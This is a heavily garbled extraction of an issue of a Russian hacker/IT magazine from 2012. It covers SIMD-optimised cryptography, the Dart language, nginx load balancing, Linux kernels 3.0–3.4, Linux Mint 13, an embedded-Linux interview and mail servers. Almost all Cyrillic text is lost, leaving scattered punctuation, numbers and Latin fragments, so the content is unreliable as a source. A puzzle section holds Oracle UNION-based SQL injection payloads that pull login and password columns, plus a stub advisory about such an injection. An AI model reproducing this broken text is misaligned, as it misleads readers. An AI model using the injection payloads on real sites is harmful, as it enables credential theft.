, .
, ,
, .
100%, (
1 RTT). 100%-
1/12 .
, Windows , 1 12 RTT.
100%- - , , , !

, , .
, . ,
.
08 /163/ 2012
2814789
,
.
, .
, , ,
, ,
. ,

RTT.
2814789
.

.
( , ) . , ,
,
. ,
, ALU.
, ,
4060
. ,

.
. . 1.
. 1.2 ( )
32- ,
86/64 .

,
.
88
, ,
256- .
1024
(256 ). , 11
32- (
).
1 ( ).
( , . . 2).

(. 1.7),
,
. ,
, , ,
.

XOR, ,
.
, ,
. 1.
. 2.
(. 1.7).

(
), -
, .
, ,
1 RTT-.
2 RTT-.
2814789
.
,
.

,
.

- .
.

, - - .
(FPU, )
,
,
. , , ,
. ,
,
.
,
, 3264
. ,
,
. (
), .
, (),
FPU, . -
,
32-
08 /163/ 2012
091

,
.
,
. , .
, ,
, .
,
.

, . :
/, ,
.
,
. , , .
: , .
. 3.
. ,
. , , , .
. ,
, . 1
2.
,
.
, ,
.
( ),
MMX-. ( ) ,
.
, ,
, .
,
,
,
,
.

64- ,
( 16
!).
2 ( ).
, 2 RTT-. ,
.
( 1)
352 , 8 , ( 2) 416
, 16 . ,
80 144
3,6 .
092
. 3.
:
, 15% , , ,

, ,
Intel,
, .
.
AMD, .
,
.
, ,
,
.
SSE- AVX-

2814789
86/64
SSE 16 FPU ( )
.
,
, SSE-.
SSE-
16 . , SSE- .
,

SSE-. ,

SSE-.
AVX-.
, SSE-
,
, SSE-
.

SSE- . 4.
SSE ,

:
,
(APIC).
08 /163/ 2012
. 4. SSE-
. 5.
, .
SSE-
, ().
(
, - ).
. Intel . . 6. . 7
SSE-,
.

,
, .
FPU
, . 128
32 .
, ,
... !
, FPU SSE
.
, , ,
Q, D, W, B,
,
SSE.
SSE-
32- ; ,
P, D.
32 ,
.
, , 3, .
, ! FPU,
.
,
FPU
.
, -

.
SSE- FPU .
,
, SSE.
16 SSE--.
SSE- FPU, (. 5).

,

.
:
, .
, , , .
AVX.
,
. .

AVX VPSHUFB.
, , .
, ;
, -
08 /163/ 2012
. 6. Intel
093

4,
. , , ....

SSE- , FPU .

.
472
. ,
3,6 59 , 236
.
580
. ,
3,6 49 ,
392 .
, 3 4 RTT, 4 8 RTT. SSE-
, ,
. 20%-
.

AVX-, Intel,
AMD. AMD, .
, , :
AMD , XOP, ,
.
. ,
3 4, ,
: ,
.
, .
,
256- (YMM-),

. , ,
256- (FPU 128 ).
,
16 YMM- .
, , , 256- ,
16
.
600700 FPU
256 .
16 RTT, ,
.

. 12 RTT-,
,
FPU. Intel ,
, !
, , .
.
, . -
094
. 7.

. ,
, ,
.
50% ,
-, , 100
.
( 8 RTT),
. 500
, .
, ,
.
Intel, AMD
FPU ( ). ,
.
,
,
,
SSE- 12 RTT.
, , , AMD 12 RTT
. ,
.
?
, .
,
, , . ,

. , AES.
, , AES- ,
100150 , !
, ( 256 ).
86/64,
.
,
. 36 RTT , 12,5 RTT,
, , .
, - .
:
,
. ( )
, , , . z
08 /163/ 2012
(ivinside.blogspot.com)

,

1
,
.
. ,
?
, ,
!
. ,
, ,
.
. ,
,
.
. : ,
, . ,
, !
,
, .
.
,
.
. : , , .

. ,
! , .
100 .
99%.
98%. ?
: , , , /. .
096

, , teas:

.

. , , . 99%,
, 1%.
99 1 . 98%
2% . , , , . ,
2% - .
, 100% * * 50 . , ,
.
-
: ERROR at line 15: ORA-01790: expression must have
same datatype as corresponding expression.
?
?
,
? , ,
?
ERROR at line 15: ORA-01790: expression must have

same datatype as corresponding expression
,
SELECT, UNION.
SQL-
Oracle :
script.php?id=-1 union select 1,2,3,4,5,6,7,8 from USERS-SQL ERROR OCCURED:Error: 1790 ORA-01790: expression must
have same datatype as corresponding expression
Oracle
SQL-, , MySQL
.
,
. , :
08 /163/ 2012
script.php?id=-1 union select 1,null,null,null,null,null,

null,null from USERS--

, . / , :
script.php?id=-1 union select 1,login,password,null,null,
null,null,null from USERS where id=1--
pCycle = true;
else
{
pCurrent->bVisited = true;
pCurrent = pCurrent->pNext;
}
}
,
. :
p1 = p2 = head;
( security
advisory), ,
.
.
securitylab.ru:
: 15.06.2012
:
:
: 1
CVSSv2 : 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE ID:
:
:
:
: script.php victim.com
:

SQL- .
-
id script.php
:

,
?
, ,
.
. , , . , :
struct Node {
...
bool bVisited;
};
, ,

. , (bVisited == true).
, :
bool bCycle = false;
pCurrent = pHead;
while (pCurrent && !pCycle)
{
if (pCurrent->bVisited == true) // , !
08 /163/ 2012
do {
p1 = p1->next;
p2 = p2->next->next;
} while (p1 != p2);
p1 p2.
, p2 , p1.
, , p2 p1. ,
,
. z

1. . , ,
(
, ).
, , . .
, , ,
,
. .
?
2. , ,
. ,
- ,
( ,
), (
). ,
, ,
. .
, .
,
. ?
3. Cisco IOS.
. ( ),

.
:
.
4. .
,
.
. : IE6+, FF3.0+, Opera
9.5+, Chrome 4.0+.
097
Spider_NET (www.vr-online.ru)

:
?
GOOGLE
Google . ,
Noop ( ,
) Go (
). 2009
, ,

,
.
, Google ,

. (,
) , C# Microsoft Delphi
Embarcadero. Google
098
Google ,
.
:
,

. Dart.
,
. ,

, .
.
, ,
.
, -,
2009 . ,
Go Noop. ,
.
2010-,
:
JavaScript (Future of Javascript doc from our
internal JavaScript Summit).

,
web-.

.
Dash ( Dart)
,

.
?
-
, , .
PHP,
Python, Java, Ruby, ++,
JavaScript.

,
08 /163/ 2012
-, Dart JavaScript

.
,
.
, -,
,
JavaScript
, ,
, .
Google,
JavaScript
( , , )
,
.
,
.
JavaScript Dart, ,
.
:
.
JavaScript ,

, CoffeeScript jQuery.
Dart , ,
( ),
JavaScript .
.
.
.
HTML5 Flash
, ,

. -
08 /163/ 2012
Dart
ECMAScript (a- JavaScript)

,
,
Dart
.
. , Dart
,

, .
. -

, .
,
.

,
,
, IDE
, ,
.
,
Google ,
.

JavaScript (
Harmony). , ,
-,
Darta.

- : ,
, ,
,
.
, ,
,

. , , ,
,
.
:

,

.

. , ,
, .

. Dart ,
jQuery.
, , ?
:
: Dart
, JavaScript
, ,
JavaScript jQuery,
.
, ,
.

Dart? Google
.
JavaScript,
2005-. JS ,
jQuery . ,
.
, Google
-
-
099

JavaScript- Dart ,
?

Dart
: , ,
? .
: , ?
: !
,
,

180 .
,
- .
Wave Buzz.
, ,
,
(Wave)
(
Buzz Google Plus).

.
: ;)
: Plus, Wave Buzz
, Dart . !
Dart , Google Web Toolkit
( ).
.
GWT -
enterprise.
HTML/CSS/
JavaScript.
Java,
MVC-.
GWT
JavaScript.
, .

Sunflower
100
Dart
Dart'
, ,
,
.
GWT .

. ( Google)
.
.
GWT ,

.
:
Flash,
,
.
,
80% Dart

.

Google Chrome Internet Explorer. Dart Chrome . Google
.
IE, Opera, Safari, FireFox?
,
Mozilla Opera Software, Apple
Microsoft ,
, .
, .
Dart IE
.
:
JavaScript. .
:
:

Dart
.
,
,

/.

Dart.
Spirodraw
08 /163/ 2012
: !
,
, Dart -
, ,
.
. Google ,
(HTML5, CSS3).
:
:
, JavaScript? Dart
(class oriented language).
, ,

C#, Delphi, Java.
- ,
Dart
. JavaScript . . ,
, ,
,
JS
.
Google ,
, :
. JavaScript
,
.

.
JavaScript,
( CoffeeScript), .
: - !
:

, -.
IDE,
JavaScript-. (, WebStorm), Open
Source (, Aptana studio).

( ). , ,
,
JavaScript.

.
?
: ,
:

,
Dart
( Chrome).
JavaScript
,
Dart , V8 (V8 JavaScript
engine). , .

. , -
, ,
, .
: ,
DART?
DART
Dart
(
Wikipedia ).
Google c 2004 . Dart Google Chrome. ,

( ). Dart .

( )
- Google.
08 /163/ 2012
HELLO WORLD DART

Dart? ,
Hello
World.
Dart
, Java C#:
//
main() {
print('Hello, world!');
//
}
(, ,
)
Dart (goo.gl/DNudD) .

, , -,
, -,

.
Dart,
,
.
Dart ,
.
.

Dart ? :
.
, Dart ,

.
,
(
), ,

. z
goo.gl/xm9qK Dart;
goo.gl/LKtMW Dart.
,
Dart;
goo.gl/y3CvR ( Darta) Wikipedia;
goo.gl/0pyFH Dart Wikipedia;
www.dartlang.org/docs/language-tour/ Dart;
goo.gl/T49aK ( ) Dart
JavaScript;
code.google.com/webtoolkit - Google;
goo.gl/LtAm7 Dart.
101

.
-
,
,

, ,

,
.

, ,
, , Photosight.ru .

, .

102
08 /163/ 2012
. 2

, .
, :
,
,
.
. , ,
, ,
- .
, . ? ,
-, . ; , ,
, .
?
-,
,

. , nginx 10
keep-alive- 2,5 .
-
, ( , , , sendfile nginx).
( ) ,
. PHP- Perl
.
nginx
, . nginx 810 ,
mod_perl 200 .
, 16
40 mod_perl, .

, ,
CSS-, ,
. nginx (

) , ,
.

.
,
?
, Facebook.

, CSS- JavaScript-
.
-
, .
,
,
. ,

.

.
, .

,

.

, nginx (

: , , - (, , ),
.
08 /163/ 2012
103

Mongrel2, Ruby-.
Ruby- , . ,
- ,
. ,
.
. .
) (, URI
),
.
, , , nginx
.
nginx
.
,
. .
Nginx . ,
( , , ), .
-. , , URI- GET-.
.
.
,

.
nginx . proxy_cache_lock.

.
-. , , ,
.
104
,
, .
,

.

JavaScript-, .

,
- .

.

Facebook.
JavaScript.

,
.
Facebook

.
JavaScript, . ,
. ,

, :
,
.
, ,
. ,
Java-,
,
GWT (Google Web Toolkit).

Microsoft Web Forms,

JavaScript ,
.
:
.

,

-
JavaScript.

, , , .

3040 ,

, .

(upstreams), ,
.

.
.
, URI /messages/
, /photo/
,
.
08 /163/ 2012
. 2
.
- , ,
,
.
2. ,
(
LA
).
. LA
,
Gone Away (

).

,
,

.

.
,
, , (rbc.ru)
.
- .

, ,
GPRS,
, ,

, .
,
nginx.

nginx.

,
,
,
. -
, .

. ?
HIGHLOAD-

, , .
, ,
-. , . ,
.
:
I. ,
. :
1.
.
2. ,
.
3. ,
( ).
II. :
1. -
08 /163/ 2012
.
nginx
.

, .

, nginx

. (
,

nginx

nginx.)

, , .
, ,
,
, ,

.

.

.
,
nginx.
.
,
,

.
HighLoad++.

Erlang.

Erlyvideo.

,

MySQL. NoSQL
Tarantool.

-

,

.
105
, . ,
, .

,
, . . -

, .
, . , .
.
, .

, .
(
), ,
. , ,
.
- - . , ,
.
. .
, 2001 ,
. spylog.ru, DNS
, , www1.spylog.
ru, www2.spylog.ru, www3.spylog.ru.
- . IPVS, NAT. ,
, .
, ,
. .
,
ping. ,
.
. , ,
, .
, , .
.
DNS-
. , ,
DNS-, ,
, DNS.
TTL (
, ). -
, , , ,
.
, , ,
. TTL .
, . , ,
DNS- , IPVS,
.
-
. .
,
,
,
.
,
.
, .
IP-.
. ,
IP- .
CARP (
FreeBSD), Heartbeat ( Linux)
.
Rambler, , , .
DNS-,

,
.

.
. ,
upstream , .
.
- ,

upstream, ,
, .
,
, .
Nginx .
, ,
-,

. , ,
.

. ,
,
,
- .
, .
,
. z

, . ?
106
08 /163/ 2012
!
8-800-200-3-999
+7 (495) 663-82-77 ()

40 % .
6 1194 .
12 2149 .
6 810 .
12 1499 .
6 1110 .
12 1999 .
6 894 .
12 1699 .
6 564 .
13 1105 .
6 599 .
12 1188 .
6 1110 .
12 1999 .
6 810 .
12 1499 .
3 630 .
6 1140 .
6 895 .
12 1699 .
6 690 .
12 1249 .
6 775 .
12 1399 .
6 1110 .
12 1999 .
6 1110 .
12 1999 .
6 950 .
12 1699 .
shop.glc.ru
UNIXOID
(execbit.ru)

LINUX 3.0 3.4
Linux

.

,
Linux-,

, -.
,
?
108
08 /163/ 2012

3.0
Linux,
, , .
2.6
,
4.0 5.0.
, ,
API
, Linux
. 3.0 ,
2.6.40.
. ,
/ (2.5 , 2.6 ),
, .
X.Y.Z, X (
3), Y , Z , ,
.
3.0
. ,
,
, , .

.
LINUX 3.0: XEN DOM0, INTEL SMEP,

CLEANCACHE, WAKE ON WLAN
Linux 3.0 Xen . Xen

.
xen-blkback,
, 3.0 2011
,
dom0. Xen Linux .
3.0 SMEP (Supervisor Mode Execution Protection),
Ivy Bridge
Intel. SMEP ,
, , . ,
shell-,
.
, , Cleancache.
,
.
Cleancache , -,

. Cleancache,
,
, .
(Transcendent
memory) ext3, ext4, Btrfs, OCFS2 Xen.
3.0
sendmmsg(), sendmsg(),
.
, .
08 /163/ 2012
,

2.6.11
2.6.12
2.6.13
2.6.14
2.6.15
2.6.16
2.6.17
2.6.18
2.6.19
2.6.20
2.6.21
2.6.22
2.6.23
2.6.24
2.6.25
2.6.26
2.6.27
2.6.28
2.6.29
2.6.30
2.6.31
2.6.32
2.6.33
2.6.34
2.6.35
2.6.36
2.6.37
2.6.38
2.6.39
3.0
3.1
3.2
389
566
545
553
612
709
736
815
801
673
767
870
912
1057
1123
1027
1021
1075
1180
1150
1166
1248
1196
1150
1187
1176
1276
1198
1258
1131
1168
1316
68
90
94
90
108
111
120
133
128
138
143
180
181
193
232
203
187
212
233
249
227
261
238
243
209
207
221
220
239
331
212
226
All
7944
855
Kernel Version
109
UNIXOID

UDP- 20%, RAW- 30%.

. Linux-
Wake on WLAN,
S3
.
, , .
BPF (Berkeley Packet Filter), , JIT- ,

, tcpdump Wireshark.
Btrfs.
,

. Btrfs ,
,
.
. btrfs filesystem defragment.
Btrfs , , ,
.
.
1520% b+ .
RAID- Btrfs
Quasi-round-robin,
, -
110
. .
3.0 9862 1276 , 44 ( 8002
, 7946 ). 41% , 25% , 15% , 5% 5%
.
LINUX 3.1: OPENRISC,

ISCSI, NFC
3.1 3.0,
.
OpenRISC, , 32- OpenRISC 1000.
OpenRISC (opencores.org/or1k/Main_Page)
OpenCores,
, ,
. , firmware, GPL
LGPL.
.
OpenRISC 1200
ORBIS32, ,
, , DSP,
. ARM10.
3.1
NFC (Near Field Communication), (10 ).
NFC ,
.
08 /163/ 2012
,

Kernel Version
2.6.11
2.6.12
2.6.13
2.6.14
2.6.15
2.6.16
2.6.17
2.6.18
2.6.19
2.6.20
2.6.21
2.6.22
2.6.23
2.6.24
2.6.25
2.6.26
2.6.27
2.6.28
2.6.29
2.6.30
2.6.31
2.6.32
2.6.33
2.6.34
2.6.35
2.6.36
2.6.37
2.6.38
2.6.39
3.0
3.1
3.2
2005-03-02
2005-05-17
2005-08-28
2005-10-27
2006-01-02
2006-03-19
2006-06-17
2006-09-19
2006-11-29
2007-02-04
2007-04-25
2007-07-08
2007-10-09
2008-01-24
2008-04-16
2008-07-13
2008-10-09
2008-12-24
2009-03-23
2009-06-09
2009-09-09
2009-12-02
2010-02-24
2010-05-15
2010-08-01
2010-10-20
2011-01-04
2011-03-14
2011-05-18
2011-07-21
2011-10-24
2012-01-04
kernel.org
08 /163/ 2012
69
108
73
61
68
77
91
95
72
68
81
75
94
108
83
88
88
76
89
78
92
84
84
81
77
80
76
69
65
64
95
72
NFC,
, , , ,
, , . Android
NFC Ice Cream Sandwich.
3.1 Writeback,

, ,
,
-. RAID , bad-. ,
iSCSI target, Linux-iSCSI.org. Btrfs
,
. ext3 -
, ,
. , XFS, Btrfs ext4.
cpufrequtils
cpupowerutils. ,
cpufrequtils,

: , GPU CPU, .
. Xen dom0
VGA-, PCI- Memory hotplug
balloon, KVM
,
.
9403 1318 , 49 .
37% , 25% , 14% , 5%
5% .
LINUX 3.2: DM THIN PROVISIONING,

EVM,

3.2 , 3.0 3.1,
Writeback,
Btrfs ext4, RAID.
Writeback, 3.1,
.

. ,
,
- ,
. ,

.
cgroups
, .
,
, ,
. ,
,
.
111
UNIXOID

TPM.
3.2 99 , 40%
, 23% , 15%
, 3% , 4%
.
BTRFS
170 000
, 60 000
EXT4
LINUX 3.3: ANDROID,

EFI, BUFFERBLOAT, OPEN VSWITCH
3.2 ext4 1 .

.
,
1 1 .
1 mkfs
e2fsprogs 1.42.
3.2 Btrfs. 3.0

(
89 43 ).

'-o recovery'.
,
xfstests 445 28 .
RAID Device Mapper
(thin provisioning),
, . ,
,
. ,
,
,
.
EVM (extended verification
module), , ,
(, LiveCD), ,
3.3 , ,
Android.
, - Google
.
staging- , Google
.
Android , ashmem ,
;
Binder,
Android; ram console
,
; logcat , ; LMK
(low memory killer)
, , ;
gpio.
3.3 Linux , EFI (Extensible Firmware Interface),
. (), ASPM (Active State Power
Management),
, 2.6.38.
procfs hidepid, /proc/PID
. ,
gid, .
,

Teaming,
, .
:
round-robin active-backup. , libteam.
LINUX
1991
1992
1993
1996
1998
1999

...

Linux

Linux
GPL,

Slackware

,

Linux
IT-

Linux
Red Hat
112
08 /163/ 2012

net_prio cgroups,
SO_PRIORITY,
, .

,
, (latency) , ,
.

Open vSwitch, (][_05_2012).
3.3 15 ,
5,6 , 1,8
, 700 ,
533 , 493 .
. , . Chrome OS
.
Yama,
Canonical
Ubuntu. Yama
:
ptrace , ;
( /tmp) ;
, / , .
Yama .
3.4 Btrfs.
,

,

(COW) Linux VM, , 64 .

(,
170 000 , 60 000 ext4).
Btrfs SUSE
. ,
, .
1200 ,
10 000 . , 40%
, 30% , 13% , 5% 6% . 42 .
LINUX 3.4: X32 ABI, YAMA,

GPU
3.4 X32 ABI,
x86_64 x86. X32 ABI

x86_64
32- x86. x86_64, , X32 ABI,
( 30%) ,
4 .
3.4 , ,

.
,
(,
). , ,
/sys,
udev.
Device Mapper verity,
.
, -
,
, Linux
. ,
,
.
, , ,

. z
INFO
2003
2005
2007
2010
2011

3.0 Linux
DFS Windows
2008.
IBM

Linux

08 /163/ 2012

BusinessWeek

Linux
Linux Foundation

Linux

Linux Android

Linux
20,

,
, ATM,

3.0
Linux

Microsoft
Kinect, ,
,

-.

ext4
3.0
punch
hole,

,

.

, 3.1

3.1 2.6.41.
113
UNIXOID
(grinder@tux.in.ua)
LINUX
MINT 13 MAYA

Linux-.
,

GNOME 3 Unity ,
-,
. ,
.
114
08 /163/ 2012
Linux Mint
UBUNTU?
Linux Mint
Open Source.
, Linux ,
. ,
(2006 ) ,
, .
Linux Mint Ada Kubuntu 6.06
Dapper Drake , , . ,
Linux Mint ,
.
GNOME,
KDE, XFce, GNOME-
. Linux
Mint , .
, .
, .
,
GNOME.
Distrowatch Linux Mint 2007 ,

Linux, , Debian, openSUSE, Fedora.
GNOME 3,
.
( ,
GNOME 3 User Experience).
Ubuntu Unity.
Linux Mint 11 Katya, Ubuntu
11.04, GNOME 2.
Ubuntu Distrowatch.
,
, Linux Mint 12
Unity GNOME 3. ,
Linux Mint, . Mint 12
GNOME 3, (Mint GNOME Shell Extension)
. DVD- MATE
08 /163/ 2012
Cinnamon
( GNOME 2), KDE4 LXDE.

GNOME 3 ,
MATE Cinnamon.
Linux Mint Ubuntu.
( ) . : , Ubuntu,
, ,
,
(3.0 Cassandra, 3.1 Celena).
Ubuntu, Linux Mint
, , x86/x64,
.
Linux Mint Debian Edition
(LMDE) rolling-,
Debian MATE/Cinnamon Xfce.
LINUX MINT 13 MAYA

Linux Mint 13
Ubuntu 12.04, . DVD-: MATE 1.2 (898 ),
Cinnamon 1.4 (817 ). mint-metamate mint-meta-cinnamon .
- Windows (mint4win) x64- .
CD-,
- ,
.
How to remaster/respin Linux Mint ISO images (goo.gl/BCeau).
UBUNTU,
LINUX MINT

,
,
X86/X64,
115
UNIXOID
MATE
12- ,
.
Wi-Fi- Broadcom b43,

b43.blacklist=yes, GRUB .
,
. ,
, LibreOffice ( ).
.
, .
MDM, MATE
GDM 2.20. mdmsetup
.
CINNAMON

, .
,
, . , Cinnamon
( MATE) . , ,
Windows, .
Windows , Maya .
USB- ,
.
Cinnamon, ,

. -
: ,
, ,
. , ,
,
.
mintMenu.
,
116
MDM
,
. - .
, , ,
,
(SSH, FTP, WebDAV
Windows).
, e-mail, .
Windows Live Google
. ,
, .

Mint-X Mint-Z, GTK3+
. ,
. , , , , ,
Cinnamon (cinnamon-settings.py),
mintDesktop. Cinnamon
, .
, Cinnamon
cinnamon-spices.linuxmint.com. Mint
, PPA. :
$ sudo add-apt-repository ppa:bimsebasse/cinnamonextras
$ sudo apt-get update
WWW

LINUX MINT 13
Linux 3.2.0
Udev 175
GCC 4.6.3
X.Org 1.11.4
MATE 1.2
Cinnamon 1.4
LibreOffice 3.5.3.2
VLC 2.0.1
FileRoller 3.4.1
Evince 3.4.0
Totem 3.0.1

Linux Mint
linuxmint.com;

Linux Mint

goo.gl/BCeau;
,

Cinnamon
cinnamonspices.linuxmint.com.
08 /163/ 2012
INFO
MONEY, MONEY, MONEY
UBUNTU 12.04
Linux Mint
. ,
, ;
,
(Yahoo, DuckDuckGo Amazon).
.
Yandex.
Ubuntu 12.04 Precise Pangolin

2012 (LTS)
,
( LTS - ).
, ( ),

. 12.04
Unity 5,
Head-Up Display (HUD), (
),
Nautilus.
, Software Center,
Rhythmbox ( Banshee), UbuntuOne Music Store.

Ubuntu One ,
, .
3.2.14, : DRM- i915,

seccomp
filter,
( ), ALPS
. amd64
, -generic
-server.
, Ubuntu
12.04
Openstack. Upstart
1.5.
Ubuntu 12.04
, cloud-.
CD- (696 ) DVD(1,6 ) amd64 i386,
CD- ARM- Toshiba
AC100/Dynabook AZ, Freescale i.MX5x, Texas
Instruments OMAP3 OMAP4.
: Kubuntu
(KDE 4.8), Xubuntu (Xfce 4.8), Lubuntu (LXDE),
Mythbuntu, Edubuntu (
) Ubuntu Studio ( ).
:
$ sudo apt-cache search cinnamon-theme
. ,
,
~/.themes (), ~/.local/share/cinnamon/applets
() /usr/share/cinnamon/extensions ().
cinnamon-settings,
.
LINUX MINT
, ,
. ,
(mintInstall),
. ,
,
, (
), .
. .
( ) .
, Linux Mint. Ubuntu (Ubuntu Software Center)
mintInstall , ,
,
.
Synaptic, , , ,
mintInstall .
Cinnamon , ( MATE ),
mintUpdate .
mintUpdate ,
. Linux Mint
, Ubuntu,
. ,
,
13- . 4- 5-
mintUpdate .
Linux Mint 13
,
2017 .

From freedom
came elegance,

,
Linux Mint
,

,
x86/x64,
.
: , ,
,
08 /163/ 2012
117
UNIXOID
mintUpdate
mintInstall
MATE
mintDesktop ,
: , ,
, . Cinnamon ( ).
mintBackup . mintWifi
Wi-Fi-, ( ):
mintNanny , .
, /etc/hosts:
0.0.0.0 odnoklassniki.ru # blocked by mintNanny
mintWelcome, .
DVD mintconstructor.
$ sudo mintwifi
mintUpload , FTP/SFTP/SCP-
. -
, Linux Mint
, . Cinnamon
,
. z
MATE VS CINNAMON
GNOME 3,

GNOME Shell, . ,
,

GNOME 2. .
MATE (mate-desktop.org)
Arch Linux
GNOME 2.32.
GNOME, , . ,
Nautilus Caja.
,
Gtk2/3-. -
118
1.2, , , , .
(,
Bluetooth)
, GNOME 2.
GTK3, .
Mint GNOME Shell
Extensions, Linux Mint 12,
,
GNOME Shell , MGSE

. 2012
Cinnamon (cinnamon.
linuxmint.com), , Linux Mint.
, -

.
Mutter Muffin. ,
, ,
, , GNOME Shell.
, MATE ,
Cinnamon .
1.4
. MATE
3D-,
Cinnamon OpenGL.

Linux.
08 /163/ 2012

.

.
-,
.
.
TSW ,
. ,

, .

TSW.
-, ,
, . -

( )
. , . 14/2
(495) 231-4383
. , . 29
(499) 724-8044

-, . 1
(812) 603-2610

TSW.
,
( ),
.

( ,
),
. ,
TSW,
.
. , . 10, . 32,
(495) 231-2363
www.kolrad.ru

www.allrad.ru
(495)730-2927/368-8000/672-7226
www.prokola.net
(812)603-2610/603-2611
UNIXOID
(execbit.ru)
0120
08 /163/ 2012

,

UBUNTU LINUX 8-

Ubuntu Linux.
8- ATmega1284p, 256
MMU.
, ,
Google.
Ubuntu Linux
(goo.gl/CM3bJ). , ,
,

SIMM 16 SD- 1 .

. ARMv5TE,
Ubuntu 9.04.

6,5 ,
ATmega1284p 24
( 20 ), , ,
: ,
Linux.
Ubuntu,
, .

, ,
,
, ,
Google, .
, .
, ?
-, A .
VMware, Kno, Lab126 (Amazon),
Google.
PalmOS (
), Android
iOS.
46 (
4). -
08 /163/ 2012
(University of Illinois) UrbanaChampaign.

1999-.
, .
.
,
.
( Amazon
Google)
, .
,
. AVR
,
, AVR-GCC
.
, AVR-GCC -
:). RAM,
,
. , ,
AVR
RAM,
- !

. AVR-GCC
int 16- ,
.
. , :
, .
, . ,
,
32- 33
0, AVR-GCC 1
. , .
. . , .
, ,
, ,
. ,
56 kernel is up.
,

.
.

?
-
A ,
,
,
/.
,
, ,
, :).
.
, .
, .
. ,
.
VoIP-.
,
.
Linux
?
?
,
A .
.
DGOS
Android Palm
121
UNIXOID
.
, ,
. -,
. , .
.

ARM?
:
A ARM,
PalmOS,
.
- , ARM.
x86 MIPS. 86 , MMU MIPS .
Ubuntu, -
Embedded? Proof of concept?
, ,
A
, , Ubuntu
.
.
,
,
CentOS.
PALMOS
PalmOS.
DGOS (dgosblog.blogspot.com) ,
, POSIX
PlamOS. : PalmOS- PowerSDHC,
SDHC ;
BluePill, -,
,
;
warpSpeed . palmpowerups.com.
MMU)

?
,
A -
8 .
8-, 16- 32- (
).
: AVR PIC18.
PIC18 (
), .

dsPIC33 ( AVR),
PIC32.
, ,
no-MMU, -

.
,
MMU .
- .
, , ,
. ?
-
? C++?

A , -

MMU? (uClinux, ,
. , ,
.
, x86 for(char i = 0; i < someVal;
i++) for(int i = 0; i < someVal; i++)
, ARM
; ARM
, 1 .
,
, 8 ,
char.
.
C++ ,
. C++, ,
(, ).
,
,
C++.
,
Google. ?
Android
A Android
Android.
Google I/O.
Accessory
Development Kit.
google.com. . :)
Accessory
Development Kit.
?
Accessory Development Kit
A , Android
, .
1 ADK,
: goo.
gl/Ztsfo, goo.gl/OG0LM. 1
. 2 .
.
,
Google I/O .
Google
:
, ,
.
?
ATmega 1284
122
08 /163/ 2012
SD-
, . Google

. ?
44. ? 45.
? 41. . Google
( - ),
. ,

Google- .
,
,
.
. .
, Google
, , 5080%
. .
, Lab126,
VMware, Kno.
,
A .
.
, ,
,
, .
:). , ,
, ,
.

?
. :)
Amazon ,
A . Kno: goo.gl/z5mH9.
, Intel Kno 30
.
. VMware
VAssert, ,
Replay Debugging.
08 /163/ 2012
Kno.
? ,
?
, ?
Kno :
A ,

.
14- ,
, ,
. Linux
( Android). , - 100
,
Intel Kno ,
.

DGOS?
?
?
:
A dgosblog.blogspot.com.
PalmOS
.
, , ,
, Palm , , .

DGOS -
?
, ,
A , - .
. , .
.

-
DGOS?
.
.
, , - mesh
networking. .
?
?
, .
A ? (-
) ,
, .
.
, ,
5700 .
.
,
. ,
. ,

.

. .
,

. ,
105 /,
300.
. :)

?
,
? :)

A .
, . ,
, . z
123
SYN/ACK
(grinder@synack.ru)
WARNING

CommuniGate Pro

8010

.
,

-,

,

,
,

.

,
.
124
08 /163/ 2012
iRedMail
: iRedMail
: iredmail.org
: GNU GPL
: *nix
*nix
, ,
.
iRedMail
. ,

,
Postfix/Dovecot
SMTP, POP3 IMAP.
,
( )
.
,
.

,
IndiMail
: IndiMail
: indimail.sf.net
: GNU GPL
: *nix
SMTP, IMAP, POP3,

QMQP, QMTP, DKIM BATV (Bounce Address
Tag Validation)
. Open
Source : Qmail, Courier IMAP/POP3,
serialmail ( ), qmailanalog (
), dotforward, fastforward, mess822,
daemontools, ucspi-tcp, Bogofilter, Fetchmail
.

. SMTP, IMAP POP3,

. , .
hostcntrl,

. IndiMail

. .
08 /163/ 2012
*nix. OpenLDAP MySQL,

.
,
, .

SpamAssassin
ClamAV, , SPF (Sender
Policy Framework), DKIM (DomainKeys Identified
Mail), HPR (HELO Randomization Prevention),
Spamtrap , , .
iptables Fail2ban.
iRedAPD (Access Policy Delegation),
Postfix,
.
- Roundcube WebMail, phpLDAPadmin, PostfixAdmin,
phpMyAdmin AWStats
. iRedAdmin, : Open Source
iRedAdmin-Pro.
,
( , Qmail). IndiMail
(queue
collection),
qmail-send/qmail-todo
.

, Qmail.

,

( 200). ,
CONTROLDIR , QUEUEDIR .
IndiMail
,
, . :
IndiMail,
.
FLASH ( Ncurses).
MySQL,
OpenLDAP.
systemd.
,
SETUID,
//, trust partitioning,
IP, access-list,
iRedMail
,

.
; MySQL, ,
( ).
i386/x86_64
Red Hat Enterprise Linux, CentOS,
Gentoo Linux, Debian, Ubuntu, openSUSE Open/
FreeBSD.
, .
- iWebAdmin QmailAdmin
tcprules, , TLS/SSL
.
IndiMail 32/64 *nix
.
,
Linux (RHEL/CentOS
5/6, Fedora, openSUSE/SLE, Mandriva, Debian
Ubuntu). 45
( /var/indimail/bin),

- iWebAdmin (
QmailAdmin), .
125
SYN/ACK
Rumble
: Rumble
: rumble.sf.net
: GNU GPL
: *nix, Windows
, SMTP
(ESMTPSA), POP3 IMAP. , .
.
C/C++, API
(Lua C/C++). . SSL/TLS, SQLite MySQL,
(MD5/PLAIN/STARTTLS),
white/grey/
blacklist, SpamAssassin, BATV VERP
(Variable Envelope Return Path).
.
x86/
x64- Linux (Generic,
Ubuntu, Debian). ,
,
.

. rumble.conf. - (
2580) modules/rumblelua/auth.cfg (
), - .
,
,
, .

SQLite,
MySQL,
.
,
.
,
. ,
RumbleLua User
.
,
, ,
, ,
,
. ,
.
Axigen: - -
Axigen
Active Directory, .
, ,
, MAPI, OP3- IMAP-.

. ,
IM-,
Jabber/XMPP. , Axigen
,
.
TLS/SSL,
:
plain, login, cram-md5, digest-md5 .
(Kaspersky, Dr.Web,
Symantec, ClamAV ) (
SpamAssassin).
SPF, DKIM, // IP / .
.
Axigen MS Outlook,
.
Axigen .
Debian,
RHEL CentOS 5/6, SUSE Linux Enterprise 10/11,
Fedora 12/13, openSUSE 11.2/11.3, FreeBSD
7.x/8.x, Solaris 10 x86/SPARC Win2k3/2k8 (x86/
x64). Virtuozzo
.
GUI-, ,
.
1015 .

,
.
, . Axigen Free Mail
Server (Office Edition)
e-mail .
- Rumble
Axigen
: Axigen
: axigen.com/ru
: GNU GPL
: Linux, FreeBSD, Solaris, Windows
, ,
